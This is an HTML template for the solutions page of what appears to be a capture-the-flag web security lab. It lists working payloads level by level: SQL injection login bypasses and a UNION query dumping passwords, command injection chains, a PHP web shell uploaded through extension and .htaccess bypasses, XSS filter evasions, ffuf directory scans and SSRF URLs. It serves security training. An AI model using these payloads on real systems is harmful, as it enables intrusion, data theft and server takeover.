{% extends "base.html" %}

{% block content %}
<div class="container py-5 mb-5">
  <script type="module" src="https://md-block.verou.me/md-block.js"></script>
  <style>
    .collapsible {
      cursor: pointer;
      padding: 18px;
      width: 100%;
      border: none;
      text-align: left;
      outline: none;
      font-size: 15px;
    }

    .content {
      padding: 0 18px;
      max-height: 0;
      overflow: hidden;
      transition: max-height 0.2s ease-out;
    }

    /* Scrollbar CSS */
    /* own scrollbar */
    html {
      /* scrollbar firefox */
      scrollbar-color: rgb(1, 1, 1) rgb(110, 110, 110);
    }

    /* Note: The -webkit-scrollbar is not supported by Firefox or IE and Edge. */

    ::-webkit-scrollbar {
      /* width */
      width: 12px;
    }

    ::-webkit-scrollbar-track {
      /* Track */
      box-shadow: inset 0 0 5px grey;
      border-radius: 8px;
    }

    ::-webkit-scrollbar-thumb {
      /* Handle */
      background: rgb(110, 110, 110);
      border-radius: 10px;
    }

    ::-webkit-scrollbar-thumb:hover {
      /* Handle on hover */
      background: rgb(110, 110, 110);
    }

    ::-webkit-scrollbar-track-piece {
      /* not handle on */
      background: rgb(1, 1, 1);
    }

  </style>
  </head>

  <body>
    <div class="container py-5">
      <h1 class="text-center">Solutions<span class="vim-caret">͏͏&nbsp;&nbsp;</span>
      </h1>
    </div>

    <!-- Solutiion for SQL Injection -->
    <button class="collapsible btn btn-dark challenge-button w-100 text-truncate pt-3 pb-3 mb-2"
      style="box-shadow: 3px 3px 3px grey;"><b><span style="font-size:larger;">SQL Injection</span></b></button>
    <div class="content">
      <P>
        <md-block>
          #### Level 1: Login as Admin ####
          ##### - username: `admin'#` or `admin' or '1'='1` #####
          ##### - password: whatever #####
          &nbsp;
          #### Level 2: Login as Admin (Problem at Double Quotes) ####
          ##### - username: `admin"#` or `admin" or "1"="1` #####
          ##### - password: whatever #####
          &nbsp;
          #### Level 3: Read the Secret in Database (Flag in `users` table, in `password` column)####
          ##### - username: `" UNION SELECT GROUP_CONCAT(password) from users #` #####
          ##### - password: whatever #####
        </md-block>
      </P>
    </div>
    <br>

    <!-- Solution for Command Injection -->
    <button class="collapsible btn btn-dark challenge-button w-100 text-truncate pt-3 pb-3 mb-2"
      style="box-shadow: 3px 3px 3px grey;"><b><span style="font-size:larger;">Command Injection</span></b></button>
    <div class="content">
      <p>
        <md-block>
          #### Level 1: Read flag (extend the command by using semi-colon) ####
          ##### - Payload: `'; cat flag_level1 #` #####
          &nbsp;
          #### Level 2: Read flag (extend the command using another method) ####
          ##### - Payload 1: `'&& cat flag_level2 #` #####
          ##### - Payload 2: `'| cat flag_level2 #` #####
          &nbsp;
          #### Level 3: Read flag (extend the command using another method) ####
          ##### - Payload 1: Input in the URL: `%27%0Acat flag_level3%20%23` #####
          ##### - Payload 2: Open Burp Suite, capture the POST Request, then change the GET param `command` value into `%27%0Acat flag_level3%20%23`
          ##### - Payload 3: ``` ' `cat flag_level3` ``` #####
        </md-block>
      </p>
    </div>
    <br>

    <!-- Solution for File Upload Vulnerabilities -->
    <button class="collapsible btn btn-dark challenge-button w-100 text-truncate pt-3 pb-3 mb-2"
      style="box-shadow: 3px 3px 3px grey;"><b><span style="font-size:larger;">File Upload
          Vulnerabilities</span></b></button>
    <div class="content">
      <p>
        <md-block>
          #### Level 1: RCE ####
          ##### - Solution: Upload `shell.php` with content `&lt;?php system($_GET['cmd']);` for easy RCE #####
          &nbsp;
          #### Level 2: RCE ####
          ##### - Solution: Upload `shell.hack.php` with content `&lt;?php system($_GET['cmd']);` for easy RCE #####
          &nbsp;
          #### Level 3: RCE (Insufficient blacklist .php extension) ####
          ##### - Solution: Upload `shell.phtml` or `shell.phar` with content `&lt;?php system($_GET['cmd']);` for easy RCE + other impact is: `upload.html` for XSS #####
          &nbsp;
          #### Level 4: RCE (Misconfiguration: allow upload .htaccess or allow .htaccess to config the uploaded directory) ####
          ##### - Solution: Upload .htaccess with content: 
          ##### `&lt;FilesMatch ".+\.ph(ar|p|tml)$"&gt;` #####
          ##### &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`SetHandler application/x-httpd-php` #####
          ##### `&lt;/FilesMatch&gt;` #####  
          ##### - Then, continue to upload `shell.txt` with content `&lt;?php system($_GET['cmd']);` for easy RCE #####
        </md-block>
      </p>
    </div>
    <br>

    <!-- Solution for Broken Authentication -->
    <button class="collapsible btn btn-dark challenge-button w-100 text-truncate pt-3 pb-3 mb-2"
      style="box-shadow: 3px 3px 3px grey;"><b><span style="font-size:larger;">Broken Authentication</span></b></button>
    <div class="content">
      <p style="font-size: larger;">Solutions for Broken Authentication (Update in the Future)</p>
    </div>
    <br>

    <!-- Solution for Cross - Site Scripting -->
    <button class="collapsible btn btn-dark challenge-button w-100 text-truncate pt-3 pb-3 mb-2"
      style="box-shadow: 3px 3px 3px grey;"><b><span style="font-size:larger;">Cross - Site
          Scripting</span></b></button>
    <div class="content">
      <p>
        <md-block>
          #### Level 1: Trigger JavaScript Alert Function ####
          ##### Payload: `&lt;script&gt;alert(origin)&lt;/script&gt;` #####
          &nbsp;
          #### Level 2: Trigger JavaScript Alert Function ####
          ##### Payload: `&lt;scr&lt;script&gt;ipt&gt;alert(origin)&lt;/scr&lt;/script&gt;ipt&gt;` #####
          &nbsp;
          #### Level 3: Trigger JavaScript Alert Function ####
          ##### Payload: `&lt;img src=not-exists onerror=alert(origin)&gt;` #####
        </md-block>
      </p>
    </div>
    <br>

    <!-- Solution for Broken Access Control (IDOR) -->
    <button class="collapsible btn btn-dark challenge-button w-100 text-truncate pt-3 pb-3 mb-2"
      style="box-shadow: 3px 3px 3px grey;"><b><span style="font-size:larger;">Broken Access Control
          (IDOR)</span></b></button>
    <div class="content">
      <p style="font-size: larger;">Solutions for (Update in the Future)</p>
    </div>
    <br>

    <!-- Solution for Path Traversal -->
    <button class="collapsible btn btn-dark challenge-button w-100 text-truncate pt-3 pb-3 mb-2"
      style="box-shadow: 3px 3px 3px grey;"><b><span style="font-size:larger;">Path Traversal</span></b></button>
    <div class="content">
      <p style="font-size: larger;">Solutions for Path Traversal (Update in the Future)</p>
    </div>
    <br>

    <!-- Solution for Information Disclosure -->
    <button class="collapsible btn btn-dark challenge-button w-100 text-truncate pt-3 pb-3 mb-2"
      style="box-shadow: 3px 3px 3px grey;"><b><span style="font-size:larger;">Information
          Disclosure</span></b></button>
    <div class="content">
      <p>
        <md-block>
          #### Flag 1: backup.zip ####
          ##### - Solution: Use directory scanning tools such as `gobuster`, `dirbuster`, `ffuf`, etc. to scan the website with the `.zip` extension, after finish scanning, you will see the `backup.zip` file, extract the file and you will get the flag #####
          ##### - Payload for `ffuf` tool: `ffuf -u http://&lt;SERVER_ADDRESS&gt;/FUZZ -w common.txt -e .zip` #####
          &nbsp;
          #### Flag 2: README.md ####
          ##### - Solution: Use directory scanning tools such as `gobuster`, `dirbuster`, `ffuf`, etc. to scan the website with the `.md` extension, after finish scanning, you will see the `README.md` file, go to that endpoint (`http://&lt;SERVER_ADDRESS&gt;/README.md`) and you will get the flag #####
          ##### - Payload for `ffuf` tool: `ffuf -u http://&lt;SERVER_ADDRESS&gt;/FUZZ -w common.txt -e .md` #####
        </md-block>
      </p>
    </div>
    <br>

    <!-- Solution for Server - Side Request Forgery -->
    <button class="collapsible btn btn-dark challenge-button w-100 text-truncate pt-3 pb-3 mb-2"
      style="box-shadow: 3px 3px 3px grey;"><b><span style="font-size:larger;">Server - Side Request
          Forgery</span></b></button>
    <div class="content">
      <p>
        <md-block>
          #### Level 1: No Flag ####
          ##### - Payload SSRF to shutdown the server: `http://127.0.0.1:9001/shutdown.php` (Note that: In the real world, you may not need the port `9001`) #####
          &nbsp;
          #### Level 2: Access Internal `admin.php` ####
          ##### - Payload SSRF to access internal `admin.php`: `http://127.0.0.1:9001/admin.php` #####
          &nbsp;
          #### Level 3 + 4 + 5 are Advanced Levels ####
        </md-block>
      </p>
    </div>
    <br>

    <!-- Solution for Advanced Challenges -->
    <button class="collapsible btn btn-dark challenge-button w-100 text-truncate pt-3 pb-3 mb-2"
      style="box-shadow: 3px 3px 3px grey;"><b><span style="font-size:larger;">Advanced Challenges</span></b></button>
    <div class="content">
      <p style="font-size: larger;">Solutions for Advanced Challenges (Update in the Future)</p>
    </div>
    <br>

    <script>
      var coll = document.getElementsByClassName("collapsible");
      var i;

      for (i = 0; i < coll.length; i++) {
        coll[i].addEventListener("click", function () {
          this.classList.toggle("active");
          var content = this.nextElementSibling;
          if (content.style.maxHeight) {
            content.style.maxHeight = null;
          } else {
            content.style.maxHeight = content.scrollHeight + "px";
          }
        });
      }
    </script>

</div>
{% endblock %}

{% block scripts %}
<script defer="defer" src="{{ url_for('views.themes', theme='core', path='js/echarts.bundle.js') }}"></script>
{% endblock %}

{% block entrypoint %}
<script defer="defer" src="{{ url_for('views.themes', theme='core', path='js/pages/scoreboard.js') }}"></script>
{% endblock %}